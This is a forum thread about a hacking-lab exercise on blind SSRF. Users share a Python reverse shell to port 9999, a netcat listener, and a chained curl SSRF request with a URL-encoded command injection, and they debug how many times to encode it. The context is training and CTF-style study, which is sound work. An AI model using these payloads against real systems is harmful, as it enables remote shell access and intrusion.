SERVER-SIDE ATTACKS Blind SSRF Exploitation Example

Hey, I’m trying to complete Blind SSRF Exploitation Example, but I can’t create a reverse shell to my netcat. Btw i’m using my local kali machine, not pwnbox, but on pwnbox i’m having the same problem

  1. I’ve twise encoded python reverse shell from the module.

Reverse shell before encoding :

export RHOST="10.10.15.192";export RPORT="9999";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
  1. Run netcat -nlvp 9999

  2. curl -i -s "http://10.129.41.183/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=python%2520-c%2520%2527import%2520sys%252Csocket%252Cos%252Cpty%253Bs%253Dsocket.socket%2528%2529%253Bs.connect%2528%2528os.getenv%2528%252210.10.15.192%2522%2529%252Cint%2528os.getenv%2528%25229999%2522%2529%2529%2529%2529%253B%255Bos.dup2%2528s.fileno%2528%2529%252Cfd%2529%2520for%2520fd%2520in%2520%25280%252C1%252C2%2529%255D%253Bpty.spawn%2528%2522%252Fbin%252Fsh%2522%2529%2527"

  3. I’m getting this response (“URL can’t contain control characters”):
    <html><body><h1>Resource: http://127.0.0.1:5000/runme?x=python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'</h1><a>URL can't contain control characters. '/runme?x=python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'' (found at least ' ')</a></body></html>

and nothing happens.

Can anyone help me please?

Ok, nevermind. I finally did it. I dont know why author said that you need to encode payload twise. You actually need to encode payload 3 times.

3 Likes

Hi lackroy, I was strugglin with url encode, I solved the section using the encode url on the academy page, but I was not able to replicate that kind of url encoding, did you encode 3 times using jq? could you please show me, how you do it?

thanks in advance

happy hacking

m477

updating the external Rhost and port to tun0 and 9999 and internal Rhost and Rport to victims ip and 8080 still not able to obtain the shell?

``export RHOST=“<VPN/TUN IP>”;export RPORT=“”;python -c ‘import
sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))));[o
s.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(“/bin/sh”)’